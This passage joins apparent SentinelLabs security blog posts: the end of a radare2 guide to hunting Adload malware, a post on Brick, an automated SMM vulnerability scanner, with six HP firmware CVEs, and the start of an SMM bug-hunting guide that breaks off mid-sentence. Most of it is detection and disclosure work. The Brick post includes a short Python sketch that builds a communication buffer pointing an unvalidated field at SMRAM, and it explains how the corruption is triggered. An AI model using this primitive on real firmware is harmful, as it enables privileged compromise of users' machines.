A supplementary approach that I often use is to focus on code logic that is less easy for authors to change and more likely to be re-used.

Let’s take a look at this sample of Adload written in Go. It’s a variant of a much more prolific version, also written in Google’s Golang. Both versions contain calls to a legit project found on Github, but this variant is missing one of the distinctive strings that made its more widespread cousin fairly easy to hunt.

A version of Adload that calls out to a popular project on Github

However, notice the URL at 0x7226. That could be interesting, but if we hit on that domain name string alone in VirusTotal we only see 3 hits, so that’s way too tight for our rule.

Your rules won’t catch much if your strings are too specific
Let’s grab some bytes immediately after the C2 string is loaded

We might do better if we try grabbing bytes of code right after that string has been loaded, for while the API string will certainly change, the code that consumes it might not. In this case, searching on 96 bytes from 0x7255 catches a more respectable 23 hits, but that still seems too low for a malware variant that has been circulating for many months.

Notice the dates – this malware has probably far more than just 23 samples

Let’s see if we can do better. One trick I find useful with r2 is to hunt down all the XREFs to a particular piece of code and then look at the calling functions for useful sequences of byte code to hunt on.

For example, you can use sf. to seek to the beginning of a function from a given address (assuming it’s part of a function, of course) and then use axg to get the path of execution to that function all the way from main(). You can use pds to give you a summary of the calls in any function along the way, which means combining axg and pds is a very good way to quickly move around a binary in r2 to find things of interest.
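
If you prefer to drive this from a script, the same sequence of commands can be run through r2pipe. A sketch follows; the sample path is a placeholder and the seek address is the one used in the example below.

import r2pipe
 
r2 = r2pipe.open("Adload_sample")   # placeholder path to the sample
r2.cmd("aaa")                       # analyse the binary
r2.cmd("s 0x01247a41")              # an address inside the function of interest (see below)
r2.cmd("sf.")                       # snap to the start of the enclosing function
print(r2.cmd("axg"))                # call path from the entry point down to this function
print(r2.cmd("pds"))                # summary of the calls made by the current function
r2.quit()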

Using the axg command to trace execution path back to main

Now that we can see the call graph to the C2 string, we can start hunting for logic that is more likely to be re-used across samples. In this case, let’s hunt for bytes where sym.main.main calls the function that loads the C2 URL at 0x01247a41.

Finding reusable logic that should be more general than individual strings

Grabbing 48 bytes from that address and hunting for it on VT gives us a much more respectable 45 TP hits. We can also see from VT that these files all have a common size, 5.33MB, which we can use as a further pivot for hunting.

Our hunt is starting to give better results, but don’t stop here!

We’ve made a huge improvement on our initial hits of 3 and then 23, but we’re not really done yet. If we keep iterating on this process, looking for reusable code rather than just specific strings, imports or method names, we’re likely to do much better, and by now you should have a solid understanding of how to do that using r2 to help you in your quest. All you need now, just like any good piece of malware, is a bit of persistence!

Conclusion

In this post, we’ve taken a look at some of r2’s lesser known features that are extremely useful for hunting malware families, both in terms of associating new samples to known families and in searching for unknown relations to a sample or samples we already have. If you haven’t checked out the previous posts in this series, have a look at Part 1, Part 2 and Part 3. If you would like us to cover other topics on r2 and reverse engineering macOS malware, ping me or SentinelLabs on Twitter with your suggestions.

Samples Used

File name SHA1
WizardUpdate_B1 2f70787faafef2efb3cafca1c309c02c02a5969b
WizardUpdate_B2 dfff3527b68b1c069ff956201ceb544d71c032b2
WizardUpdate_B3 814b320b49c4a2386809b0bdb6ea3712673ff32b
WizardUpdate_B4 6ca80bbf11ca33c55e12feb5a09f6d2417efafd5
WizardUpdate_B5 92b9bba886056bc6a8c3df9c0f6c687f5a774247
WizardUpdate_B6 21991b7b2d71ac731dd8a3e3f0dbd8c8b35f162c
WizardUpdate_B7 6e131dca4aa33a87e9274914dd605baa4f1fc69a
WizardUpdate_B8 dac9aa343a327228302be6741108b5279adcef17
Adload 279d5563f278f5aea54e84aa50ca355f54aac743

✇SentinelLabs

Another Brick in the Wall: Uncovering SMM Vulnerabilities in HP Firmware

By: Assaf Carlsbad

By Assaf Carlsbad & Itai Liba

Executive Summary

  • SentinelLabs has discovered 6 high severity flaws in HP’s UEFI firmware impacting HP laptops and desktops.
  • Attackers may exploit these vulnerabilities to locally escalate to SMM privileges.
  • SentinelLabs findings were proactively reported to HP on Aug 18, 2021, and are tracked as:
    • CVE-2022-23956, marked with a CVSS score of 8.2
    • CVE-2022-23953, marked with a CVSS score of 7.9
    • CVE-2022-23954, marked with a CVSS score of 7.9
    • CVE-2022-23955, marked with a CVSS score of 7.9
    • CVE-2022-23957, marked with a CVSS score of 7.9
    • CVE-2022-23958, marked with a CVSS score of 7.9
  • HP has released a security update to its customers to address these vulnerabilities.
  • At this time, SentinelOne has not discovered evidence of in-the-wild abuse.

Hello and welcome back to yet another post in our blog post series covering UEFI & SMM security. This is the 6th (!) entry in the series, and it’s a good spot to pause for a second and look back to better appreciate the vast distance we covered: from the baby steps of merely dumping and peeking at UEFI firmware, through the development of emulation infrastructure for it, and up to the point where we learned how to proactively hunt for SMM vulnerabilities. This post will continue where we left off last time and will further explore SMM vulnerabilities, albeit from a slightly different angle.

So far, the SMM bug hunting methodology we came up with is mostly manual and goes roughly as follows:

  1. Obtain a UEFI firmware image of interest, either by dumping it from the SPI flash or, when possible, downloading it directly from the vendor’s website.
  2. Extract the encapsulated SMM binaries via tools such as UEFITool or UEFIExtract.
  3. Open the SMM images one by one in IDA and analyze them using efiXplorer, while keeping a keen eye for vulnerable code patterns like the ones described in the previous part.

Needless to say, this process is extremely slow, inaccurate, and cumbersome. After doing it over and over again, we were so unsatisfied with it that we decided to take the intuition and rules-of-thumb we developed and codify them into the form of an automated tool. The outcome of this endeavor is an IDA-based vulnerability scanner for SMM binaries we named Brick. For the benefit of the firmware security community, we decided to publish it as an open-source project that is readily available on GitHub.

In this post, we’ll introduce readers to Brick, its internal architecture, and its bug-hunting capabilities. Afterward, we’ll present a case study where we demonstrate how Brick was used to discover 6 different vulnerabilities affecting the firmware of some HP laptops. By doing so, we hope to encourage more people in the community to contribute back to Brick, as well as to educate the readers about the potential strengths (and weaknesses) of automated vulnerability hunting.

Enjoy the read!

Automated SMM Vulnerability Hunting Using Brick

As we said, Brick was developed to pinpoint certain vulnerabilities and anti-patterns inside SMM binaries. To effectively pull this off, its execution lifecycle is split into three different phases: harvest phase, analysis phase, and summary phase. Following is a detailed description of each phase.

Figure 1 – Schematic overview of Brick’s execution lifecycle

Harvest Phase

In the vast majority of cases, it’s most useful to give Brick a complete UEFI firmware image to scan. Doing so allows the researcher to “squeeze” the most vulnerabilities out of it while also gaining a bird-eye view of the code quality of the firmware as a whole. Alas, a typical UEFI firmware image is a complex beast that contains much more than SMM binaries. Among other things, it usually includes other stuff such as

  • Non-SMM executable modules for the different boot phases (PEI/DXE/etc.)
  • Microcode updates for the target CPU to be applied during early boot
  • Various Authenticated Code Modules (ACMs) signed by Intel, such as Boot Guard and BIOS Guard
  • A store for NVRAM variables
  • And much more
Figure 2 – SMM binaries are by no means the only file type stored inside a firmware image

Because of that, our first task is to separate the wheat from the chaff. In Brick’s terminology, this is accomplished by the harvest phase. During this phase, Brick will parse the firmware image and extract out of it just the SMM binaries we’re interested in.

To invoke Brick and kickstart the harvest phase, just pass the full path of the firmware’s image to the Brick.py script:

Figure 3a – The harvest phase in action

Internally, the harvest phase is implemented by offloading most of the actual work to two external tools/libraries.

The reason we use two different solutions for this phase is that we encountered several cases where one of them struggled to properly parse a UEFI image, while the other succeeded without any hurdles. Thus, the strategy of using one of them and falling back to the other in case of failure gives us just the right amount of redundancy we need to successfully handle the vast majority of firmware images encountered in the wild.

At the end of the harvest phase — given that all went well — the output directory should contain several dozens of SMM binaries waiting for further examination.

Figure 3b – The output directory at the end of the harvest phase

Note that in addition to full UEFI firmware images, Brick also supports other input formats in case you want to limit bug hunting to a narrower scope. These include

  • A single executable file (e.g. foo.efi)
  • Directory that contains multiple SMM binaries
  • UEFI capsule update package
  • Various other options (see the source code for the complete list of supported options).

Analysis Phase

At this point, we have a directory filled with the SMM binaries we’re interested in analyzing. The rough idea was to open each SMM binary in IDA and — after the initial autoanalysis completes — run some custom IDAPython scripts on top of it to do the actual bug hunting. This must be done intelligently, as a naive solution for this problem would suffer from two severe downsides:

  1. Analyzing SMM binaries one at a time is not very efficient performance-wise. For this reason, we should strive to parallelize the whole process while taking advantage of multiple CPU cores.
  2. IDA is mostly used in an interactive fashion, and while there exists a batch mode for non-interactive usage, it’s often overlooked as it’s not very convenient to use.

Luckily for us, it didn’t take us too long to bump into a project called idahunt that solves these exact two problems. In the author’s own words:

“idahunt is a framework to analyze binaries with IDA Pro and hunt for things in IDA Pro. It is a command-line tool to analyze all executable files recursively from a given folder. It executes IDA in the background so you don’t have to manually open each file. It supports executing external IDA Python scripts.”

Figure 4 – Overview of using idahunt to speed up the scanning process

The IDAPython scripts executed by idahunt on behalf of Brick are known as Brick modules and come in three different flavors:

  • Processing modules, which are in charge of doing some initial preparatory work and handling some of the shenanigans of UEFI.
  • Hunting modules that employ a wide range of heuristics to pinpoint potential vulnerabilities. Usually, there exists a dedicated module for each of the vulnerability classes described earlier.
  • Informational modules, which emit valuable information about the target image that is not necessarily tied to vulnerabilities. This includes, for example, the list of unrecognized UEFI protocols consumed by the image.
Figure 5 – Overview of the various Brick modules

While developing these Brick modules, we found the raw IDAPython API to be a bit rough at times, so for the most part the modules were developed on top of a wrapper framework called Bip. One of the major highlights of this framework is that it also exposes wrapper functions for the Hex-Rays Decompiler API, which allows writing analysis routines in a fairly high-level notion.

Figure 6 – The analysis phase, running 8 concurrent IDA instances in the background

Summary Phase

After all SMM images in the input directory have been scanned, Brick moves on to collect the output emitted by the individual modules and merges it into a single, browsable HTML report.

Note that in addition to the scan’s verdict, the report file also includes links to some useful resources such as the annotated IDB file (necessary for validating the correctness of the results), the raw IDA log file (useful for troubleshooting and debugging), as well as a separate report file generated by efiXplorer.

Figure 7 – Portion of a Brick report produced for some firmware image

Case Study – Using Brick to Uncover HP Firmware Vulnerabilities

Throughout the past year, we have been using Brick extensively to review various firmware images from almost all leading manufacturers in the industry. So far, this campaign is definitely paying off and has already given birth to no fewer than 13 different CVEs (see Appendix A). In this case study, we would like to put a spotlight on several such vulnerabilities found while auditing one particular firmware image from HP (version 01.04.01 Rev.A for the HP ProBook 440 G8 Notebook). After Brick’s scan completed, we opened the resulting report file and were faced with a rather intriguing entry:

Figure 8 – The SMM module 0155.efi does not validate certain nested pointers

This entry immediately drew our attention because, if confirmed correct, it means that the SMI handler installed by the SMM image 0155.efi does not validate certain pointers that are nested within its communication buffer. As we explained in the previous post, that in turn implies the handler can be exploited by attackers to corrupt or disclose the contents of SMRAM.

In this section, we’ll elaborate on how Brick managed to find such vulnerability in a completely automated fashion. For that, we’ll walk you through the internal workings of some Brick modules that were involved in making this verdict. Note that due to the medium of a written article, the case study will be presented using snapshots of the IDA database, before and after each module invocation. In reality, however, all modules will be executed automatically one after another, without any user interaction.

Preprocessor

The first Brick module invoked for any input file is the preprocessor. The preprocessor sets up the ground for the next modules in the chain and takes care of the following:

  • Making the .text section read-write, which prevents the decompiler from performing some excessive optimizations.
  • Discovering functions that the initial auto-analysis missed (based on codatify).
  • Scraping the edk2 and edk2-platforms repositories for protocol header files and attempting to import them into the IDA database. The net result is that the database is filled with a plethora of UEFI protocol definitions:
Figure 9 – Some UEFI protocols that were imported from EDK2 by the preprocessor

efiXplorer

Right after the preprocessor, Brick moves on to load and run the efiXplorer plugin. As we mentioned countless times throughout the series, efiXplorer has tons of functionality and serves as the de-facto standard way of analyzing UEFI binaries with IDA. Among other things, it takes care of the following:

  • Locating and renaming known UEFI GUIDs
  • Locating and renaming calls to UEFI boot/runtime services
  • Applying correct types for interface pointers
Figure 10 – Pseudocode from a decompiled function before efiXplorer was invoked
Figure 11 – The same function, after efiXplorer analysis

Last but not least, efiXplorer is also capable of locating and renaming SMI handlers. In its recent editions, it prefixes all CommBuffer-based SMIs with ‘SmiHandler’, and all legacy software SMIs with ‘SwSmiHandler’. As can be seen, in the case of 0155.efi, only one SMI handler seems to exist:

Figure 12 – the SMI handler found by efiXplorer

Postprocessor

Following efiXplorer, control is passed to the postprocessor. The postprocessor is a module that is in charge of completing the analysis performed earlier by efiXplorer. Among other things, this includes:

  • Locating SMI handlers that efiXplorer might have missed
  • Fixing the function prototype for some UEFI services such as GetVariable()/SetVariable()
  • Renaming function arguments

In the context of this case study, the most important feature of the postprocessor is the handling of calls to EFI_SMM_ACCESS2_PROTOCOL. In a nutshell, this protocol is used to control the visibility of SMRAM on the platform. As such, it exposes the respective methods to open, close, and lock SMRAM.

Figure 13 – interface definition for EFI_SMM_ACCESS2_PROTOCOL, source: Step to UEFI

In addition to those, this protocol also exposes a method called GetCapabilities(), which can be used by clients to query the memory controller for the exact location of SMRAM in physical memory. Upon return, this function fills in an array of EFI_SMRAM_DESCRIPTOR structures that informs the caller what regions of SMRAM exist, their size, their state (open vs. closed), etc.

Figure 14 – documentation of the GetCapabilities() function, source: Step to UEFI

In EDK2 and its derived implementations, the common practice is to store these EFI_SMRAM_DESCRIPTORs as global variables so that they can be consumed by other functions in the future. As part of its operation, the postprocessor scans the input file for calls to GetCapabilities() and marks the SMRAM descriptors in a way that makes them easy to recover afterward. This includes both retyping them as 'EFI_SMRAM_DESCRIPTOR *' and renaming them to have a unique, known prefix. The significance of this operation will become clear shortly.

Figure 15 – Calling GetCapabilities(), before running the postprocessor
Figure 16 – Same code, after applying the postprocessor

Reconstructing the CommBuffer

Initially, the type assigned to the CommBuffer in the SMI handler’s signature is VOID *. This is adequate, as the structure of the CommBuffer is not known in advance and it’s the responsibility of the handler to correctly interpret it. Still, figuring out the internal layout of the Communication Buffer will be of great aid because it will let us know whether or not it contains nested pointers.

Usually, such tasks are completed manually as part of the reverse engineering process, but in Brick we needed to pull this off automatically. The two most prominent and successful IDA plugins for doing so are HexRaysPyTools and HexRaysCodeXplorer. Based on our experience, HexRaysPyTools produced more accurate results, while HexRaysCodeXplorer is better suited for non-interactive use. Eventually, the scriptability capabilities of HexRaysCodeXplorer tipped the scale in its favor and so it was incorporated into Brick.

Figure 17 – HexRaysCodeXplorer can be invoked from an IDAPython script

At this stage, all SMI handlers present in the image were already identified so Brick can iterate over them and invoke HexRaysCodeXplorer on the associated CommBuffer to reconstruct its internal structure. Doing so for the SMI handler from 0155.efi yields the following structure, which holds two members (field_18 and field_28) that are presumably pointers by themselves:

Figure 18 – the reconstructed structure of the Comm Buffer

How did HexRaysCodeXplorer get to this conclusion? To answer this question, let’s take a closer look at the handler’s code itself:

Figure 19 – The SMI handler forwards CommBuffer->field_18 to sub_17AC

As can be seen, during the course of its operation, the handler passes CommBuffer->field_18 as the 2nd argument to the function sub_17AC. This function, in turn, forwards it to CopyMem(), where it is used as the destination buffer. Based on the signature of CopyMem(), we know the destination buffer is in fact a pointer. That means the argument to sub_17AC is also a pointer, and therefore — due to the transitivity of assignments — CommBuffer->field_18 must be a pointer as well! The same logic also applies to field_28, though we won’t show it here.

Figure 20 – The 2nd argument is forwarded as the destination buffer for CopyMem()

Resolving SmmIsBufferOutsideSmmValid

Now that it knows the CommBuffer does contain some nested pointers, Brick moves on and checks if these pointers are being sanitized properly. That is a two-fold operation:

  1. Locating the function SmmIsBufferOutsideSmmValid() in the input binary.
  2. If found, check that it is aptly used to sanitize the nested pointers.

Let’s start with resolving SmmIsBufferOutsideSmmValid(). As we mentioned in the previous part, SmmIsBufferOutsideSmmValid() is statically linked to the binary and thus locating it is not a trivial problem. To pull this off, we compiled a heuristic composed of three conditions. Brick will iterate over all of the functions in the IDA database and try to find a function that matches all three (a combined sketch of this loop follows the list below). The heuristic goes as follows:

  1. The function at hand must receive two integer arguments – the first used as the buffer’s address and the second as its size. With the help of Bip’s API, checking for these properties is rather trivial:
    def check_arguments(f: BipFunction):
        # The arguments of the function must match (EFI_PHYSICAL_ADDRESS, UINT64)
        if (f.type.nb_args == 2 and \
            isinstance(f.type.get_arg_type(0), BTypeInt) and \
            isinstance(f.type.get_arg_type(1), BTypeInt)):
            return True
        else:
            return False
    

    Figure 21 – Matching the arguments of SmmIsbufferOutsideSmmValid

  2. The function at hand must return a BOOLEAN value. From the perspective of the decompiler, BOOLEAN values are just plain integers, so if we want to make this distinction we must go over all the return statements in the function and check if the returned value is a member of the set {0,1}. In Bip, this can also be accomplished very easily:
    def check_return_type(f: BipFunction):
        if not isinstance(f.type.return_type, BTypeInt):
            # Return type is not something derived from an integer.
            return False
     
        def inspect_return(node: CNodeStmtReturn):
            if not isinstance(node.ret_val, CNodeExprNum) or node.ret_val.value not in (0, 1):
                # Not a boolean value.
                return False
     
        # Run 'inspect_return' on all return statements in the function.
        return f.hxcfunc.visit_cnode_filterlist(inspect_return, [CNodeStmtReturn])
    

    Figure 22 – Checking the function actually returns a BOOLEAN value

  3. Lastly, we know that SmmIsBufferOutsideSmmValid() uses an array of EFI_SMRAM_DESCRIPTORS to keep track of active SMRAM ranges, so we expect the candidate function to reference at least one of them. Because global EFI_SMRAM_DESCRIPTORS were already marked earlier by the postprocessor, checking for xrefs between the function and the descriptors becomes straightforward:
    def references_smram_descriptor(f: BipFunction):
        # The function must reference at least one SMRAM descriptor.
        for smram_descriptor in BipElt.get_by_prefix('gSmramDescriptor'):
            if f in smram_descriptor.xFuncTo:
                return True
        else:
            # No xref to SMRAM descriptor.
            return False
    

    Figure 23 – Checking the function references an EFI_SMRAM_DESCRIPTOR
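
Putting the three conditions together, the overall matching loop is conceptually simple. The sketch below is not Brick’s verbatim code: it reuses the three check functions from Figures 21-23 and assumes Bip exposes an iterator over all functions in the database (called BipFunction.iter_all() here).

def resolve_smm_is_buffer_outside_smm_valid():
    # Return every function that satisfies all three heuristics defined above.
    candidates = []
    for f in BipFunction.iter_all():    # assumed Bip iterator over all functions
        if check_arguments(f) and check_return_type(f) and references_smram_descriptor(f):
            candidates.append(f)
    return candidates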

Are these heuristics bulletproof, guaranteeing they will always match SmmIsBufferOutsideSmmValid() in the binary? Of course not! But more often than not they do the trick, and that’s what matters. In the HP case, the heuristics didn’t fail and managed to find a proper match:

Figure 24 – Matching SmmIsBufferOutsideSmmValid()

Nested Pointers Validation

Once SmmIsBufferOutsideSmmValid() is matched, Brick verifies it is being used properly by the SMI handler. For that, it iterates over all calls to SmmIsBufferOutsideSmmValid() and tries to deduce whether all nested pointers are covered by them. In 0155.efi, it notices there is only one call to SmmIsBufferOutsideSmmValid(), and it is used to validate field_28. This implies that no validation is performed on the second nested pointer, field_18, so Brick flags the handler as vulnerable.

Figure 25 – SmmIsBufferOutsideSmmValid validates one field while neglecting the other one

To be fair, we were quite lucky to encounter such a clear-cut case as the one above. If the control flow were a bit more convoluted, there is a decent chance Brick’s verdict would have been more ambiguous.

Impact

We already saw that, depending on the exact flow the handler takes, it might end up calling sub_17AC. This function receives an argument derived from CommBuffer->field_18 and later forwards it as the destination address for CopyMem(). The contents of the CommBuffer are fully controllable by the attacker, who can leverage the missing validation to craft a buffer whose field_18 points to an arbitrary SMRAM address of their choice. As a result, the SMRAM region at that address will be corrupted once CopyMem() is called.

Figure 26 – CommBuffer->field_18 is passed from SmiHandler through sub_17AC and ends up at CopyMem
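
To make the primitive concrete, here is a minimal sketch of how such a communication buffer could be laid out. The offsets (0x18 and 0x28, inferred from the field names), the overall buffer size, and the addresses are illustrative assumptions, not values taken from the vulnerable module:

import struct

SMRAM_TARGET = 0x88800000      # hypothetical SMRAM address the attacker wants to corrupt
SAFE_BUFFER  = 0x00001000      # hypothetical non-SMRAM address that passes the single check

# Hypothetical layout: field_18 at offset 0x18, field_28 at offset 0x28.
comm_buffer = bytearray(0x30)
struct.pack_into('<Q', comm_buffer, 0x18, SMRAM_TARGET)  # never validated, reaches CopyMem()
struct.pack_into('<Q', comm_buffer, 0x28, SAFE_BUFFER)   # the only field SmmIsBufferOutsideSmmValid() sees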

How to cause the handler to actually call sub_17AC, and how to promote this memory corruption into arbitrary code execution in SMM, are left as exercises for the diligent reader.

Low SMRAM Corruption

In addition to the nested pointer vulnerability present in 0155.efi, the HP firmware image also suffered from 5 additional, less severe issues that enable attackers to corrupt the low portion of SMRAM. All five vulnerabilities are isomorphic to each other, so we’ll focus on the simplest case found in 017D.efi:

Figure 27 – Low SMRAM corruption discovered in 017D.efi

As we mentioned in the previous post, these vulnerabilities arise when an SMI handler writes data to the communication buffer without first validating its size. Attackers can place the CommBuffer just below SMRAM, so that once the handler performs the write, the bottom of SMRAM is unintentionally corrupted as well.

We also noted that SMI handlers can shield themselves from these problems by performing one or both of the following actions:

  1. Calling SmmIsBufferOutsideSmmValid on the CommBuffer with the exact size expected by the handler.
  2. Dereferencing the provided CommBufferSize argument (a pointer to an integer value holding the size of the buffer), then comparing the result against the expected size.

Therefore, to detect this class of vulnerabilities, Brick searches for SMI handlers that omit both checks. Unlike the previous case, this time the heuristics employed to resolve SmmIsBufferOutsideSmmValid() bore no fruit, so Brick simply assumes it’s absent from the binary and moves on to check if CommBufferSize is being dereferenced. This is achieved by traversing the AST associated with the handler, looking for nodes that correspond to a dereference operation (cot_ptr in the Hex-Rays terminology). The child node of a dereference operation in the tree represents the variable being dereferenced, so Brick can check if it’s CommBufferSize.

Figure 28 – The portion of the AST that corresponds to dereferencing CommBufferSize

If such a pair of nodes is found, it tells us that the C source code for the handler contained the expression: *CommBufferSize, so we can assume the programmer intended to compare that value against some anticipated size.

Figure 29 – The corresponding C source code for the dereference operator

Using Bip, implementing this heuristic is easy and only takes a handful of Python lines:

def dereferences_CommBufferSize(handler: BipFunction):
    # CommBufferSize is the 3rd argument of the SMI handler
    CommBufferSize = handler.hxcfunc.args[2]
 
    if not CommBufferSize._lvar.used:
        # CommBufferSize is not touched at all.
        return False
 
    def inspect_dereference(node: CNodeExprPtr):
        child = node.ops[0].ignore_cast
 
        if isinstance(child, CNodeExprVar) and child.lvar == CommBufferSize:
            # Counter-intuitively, we return False here just to signal the visitor to stop the search.
            return False
 
    # Run 'inspect_dereference' on all dereference expressions in the function.
    return not handler.hxcfunc.visit_cnode_filterlist(inspect_dereference, [CNodeExprPtr])

Figure 30 – Implementing the heuristic in Python

Unfortunately, this heuristic yields no results, so Brick now knows CommBufferSize is not being dereferenced and as a result marks the handler as vulnerable.

Figure 31 – Brick’s assessment of 017D.efi

Conclusion

Judging by the number of CVEs it has already generated, we believe Brick is a very promising project that takes a big step in the right direction of harnessing automation to streamline the bug hunting process. This belief was reinforced recently when a related project called FwHunt was released. FwHunt attempts to solve the same set of problems as Brick, only using strict rule sets rather than more relaxed heuristics.

Using automation, rules, heuristics, and other static code analysis techniques to crack through complex problems is very much desirable, but it’s always important to remember that reality is more complex than how we describe it. As such, occasional edge conditions that cause Brick and other automated tools to generate false positives and false negatives from time to time are inevitable.

That is perfectly acceptable, as long as we keep in mind that these tools were never intended to fully replace a human analyst, but rather to empower them to handle larger and larger quantities of data. Ultimately, it’s not the tool itself that makes the difference, but rather the human being who chooses how to use it, on what targets, and how to interpret its findings.

If you’re interested in learning more about the subject, come attend the upcoming Insomnihack conference, where we will deliver a talk about some more SMM vulnerabilities, this time found in the Intel codebase.

See you there!

Appendix A – List of CVEs by Brick

CVE ID CVSS score Vendor
CVE-2021-36342 7.5 Dell
CVE-2021-44346 ? Gigabyte
CVE-2021-0157 8.2 Intel
CVE-2021-0158 8.2 Intel
CVE-2021-42055 6.8 ASUS
CVE-2021-3599 6.7 Lenovo
CVE-2021-3786 5.5 Lenovo
CVE-2022-23956 8.2 HP
CVE-2022-23953 7.9 HP
CVE-2022-23954 7.9 HP
CVE-2022-23955 7.9 HP
CVE-2022-23957 7.9 HP
CVE-2022-23958 7.9 HP

Appendix B – References and Further Reading

✇SentinelLabs

Zen and the Art of SMM Bug Hunting | Finding, Mitigating and Detecting UEFI Vulnerabilities

By: Assaf Carlsbad

It’s been almost a full year since we published the last part of our UEFI blog post series. During that period, the firmware security community was more active than ever and produced several high-quality publications. Notable examples include the discovery of new UEFI implants such as MoonBounce and ESPecter, and the recent disclosure of no less than 23 high-severity BIOS vulnerabilities by Binarly.

Here at SentinelOne, we haven’t been sitting idle either. In the past year, we tried our hand at hunting down and exploiting SMM vulnerabilities. After spending several months doing so, we noticed some repetitive anti-patterns in SMM code and developed a pretty good intuition regarding the potential exploitability of bugs. We concluded 2021 having disclosed 13 such vulnerabilities, affecting most of the well-known OEMs in the industry. In addition, several more vulnerabilities are still moving through the responsible disclosure pipeline and should go public soon.

In this blog post, we would like to share the knowledge, tools, and methods we developed to help uncover these SMM vulnerabilities. We hope that by the time you finish reading this article, you too will be able to find such firmware vulnerabilities yourself. Please note that this article assumes a solid knowledge of SMM terminology and internals, so if your memory needs a refresher, we highly recommend reading the articles in the Further Reading section before proceeding. And now, let’s get started.

Classes of SMM Vulnerabilities

While in theory SMM code is isolated from the outside world, in reality, there are many circumstances in which non-SMM code can trigger and even affect code running inside SMM. Because SMM has a complex architecture with lots of “moving parts” in it, the attack surface is pretty vast and contains among other things data passed in communication buffers, NVRAM variables, DMA-capable devices, and so on.

In the following section, we will go through some of the more common SMM security vulnerabilities. For each vulnerability type, we will provide a brief description, some recommended mitigations as well as a strategy for detecting it while reversing. Note that the list of vulnerabilities is not exhaustive and contains only vulnerabilities that are specific to the SMM environment. For that reason, it will not include more generic bugs such as stack overflows and double-frees.

SMM Callouts

The most basic SMM vulnerability class is known as an “SMM callout”. This occurs whenever SMM code calls a function located outside of the SMRAM boundaries (as defined by the SMRRs). The most common callout scenario is an SMI handler that tries to invoke a UEFI boot service or runtime service as part of its operation. Attackers with OS-level privileges can modify the physical pages where these services live prior to triggering the SMI, thus hijacking the privileged execution flow once the affected service is called.

Figure 1 – Schematic overview of an SMM callout, source: CanSecWest 2015

Mitigation

Besides the obvious approach of not writing such faulty code in the first place, SMM callouts can also be mitigated at the hardware level. Starting from the 4th generation of the Core microarchitecture (Haswell), Intel CPUs support a security feature called SMM_Code_Chk_En. If this security feature is turned on, the CPU is prohibited from executing any code located outside the SMRAM region once it enters SMM. One can think of this feature as the SMM equivalent of Supervisor Mode Execution Prevention (SMEP).

Querying for the status of this mitigation can be done by executing the smm_code_chk module from CHIPSEC.

Figure 2 – Using chipsec to query for the hardware mitigation against SMM callouts

Detection

Static detection of SMM callouts is pretty straightforward. Given an SMM binary, we should analyze it while looking for SMI handlers that have some execution flow that leads to calling a UEFI boot or runtime service. This way, the problem of finding SMM callouts is reduced to the problem of searching the call graph for certain paths. Luckily for us, no additional effort is required at all since this heuristic is already implemented by the excellent efiXplorer IDA plugin.

As we mentioned in previous posts in the series, efiXplorer is a one-stop-shop and serves as the de-facto standard way of analyzing UEFI binaries with IDA. Among other things, it takes care of the following:

  • Locating and renaming known UEFI GUIDs
  • Locating and renaming SMI handlers
  • Locating and renaming UEFI boot/runtime services
  • Recent versions of efiXplorer use the Hex-Rays decompiler to improve analysis. One such feature is the ability to assign the correct type to interface pointers passed to methods such as LocateProtocol() or its SMM counterpart SmmLocateProtocol().

A note to Ghidra users: We also want to add that the Ghidra plugin efiSeek takes care of all the changes in the list above. However, it doesn’t include the UI elements like the protocols window and the vulnerability detection capabilities offered by efiXplorer.

After analysis of the input file is complete, efiXplorer will move on to inspect all calls carried out by SMI handlers, which yields a curated listing of potential callouts:

Figure 3 – Callouts found by efiXplorer
Figure 4 – sub_7F8 is reachable from an SMI handler but still calls a boot service located outside of SMRAM

For the most part, this heuristic works great, but we’ve encountered several edge cases where it might generate some false positives as well. The most common one is caused by the usage of EFI_SMM_RUNTIME_SERVICES_TABLE. This is a UEFI configuration table that exposes the exact same functionality as the standard EFI_RUNTIME_SERVICES_TABLE, with the only significant difference being that, unlike its “standard” counterpart, it resides in SMRAM and is therefore suitable to be consumed by SMI handlers. Many SMM binaries re-map the global RuntimeServices pointer to the SMM-specific implementation after completing some boilerplate initialization tasks:

Figure 5 – Remapping the global RuntimeService pointer to the SMM-compatible implementation

Calling runtime services via the re-mapped pointer yields a situation that appears to be a callout at first glance, though a closer examination will prove otherwise. To overcome this, analysts should always search the SMM binary for the GUID identifying EFI_SMM_RUNTIME_SERVICES_TABLE. If this GUID is found, chances are that most of the callouts involving UEFI runtime services are false positives. This does not apply to callouts involving boot services, though.

Figure 6 – A false positive caused by calling GetVariable() via the re-mapped RuntimeService pointer

Another source of potential false positives is various wrapper functions which are “dual-mode”, meaning they can be called from both SMM and non-SMM contexts. Internally, these functions dispatch a call to an SMM service if the caller is executing in SMM, and dispatch a call to the equivalent boot/runtime service otherwise. The most common example we’ve seen in the wild is FreePool() from EDK2, which calls gSmst->SmmFreePool() if the buffer to be freed resides in SMRAM, or calls gBs->FreePool() otherwise.

Figure 7 – The FreePool() utility function from EDK2 is a common source of false positives

As this example demonstrates, bug hunters should be aware that static code analysis techniques have a hard time determining that certain code paths won’t be executed in practice, and as such they are likely to flag this as a callout. Some tips and tricks for identifying this function in compiled binaries will be conveyed in the Identifying Library Functions section.

Low SMRAM Corruption

Description

Under normal circumstances, the communication buffer used to pass arguments to the SMI handler must not overlap with SMRAM. The rationale for this restriction is quite simple: if that wasn’t the case, any time the SMI handler would write some data into the comm buffer — for example, in order to return a status code to the caller — it would also modify some portion of SMRAM along the way, which is undesirable.

Figure 8 – This situation should not occur

In EDK2, the function responsible for checking whether or not a given buffer overlaps with SMRAM is called SmmIsBufferOutsideSmmValid(). This function gets called on the communication buffer upon each SMI invocation in order to enforce this restriction.

Figure 9 – EDK2 forbids the comm buffer from overlapping with SMRAM

Alas, since the size of the communication buffer is also under the attacker’s control, this check on its own is not enough to guarantee sound protection, and some additional responsibilities lie on the shoulders of firmware developers. As we will see shortly, many SMI handlers fail here and leave a gap attackers can exploit to violate this restriction and corrupt the bottom portion of SMRAM. To understand how, let’s take a closer look at a concrete example:

Figure 10 – A vulnerable SMI handler

Above we have a real-life, very simple SMI handler. We can divide its operation into 4 discrete steps:

  1. Sanity checking the arguments.
  2. Reading the value of the MSR_IDT_MCR5 register into a local variable.
  3. Computing a 64-bit value out of it, then writing the result back to the communication buffer.
  4. Returning to the caller.

The astute reader might have noticed that during step 3, an 8-byte value is written to the Comm Buffer, but nowhere during step 1 does the code check for the prerequisite that the buffer is at least 8 bytes long. Because this check is omitted, an attacker can exploit it by:

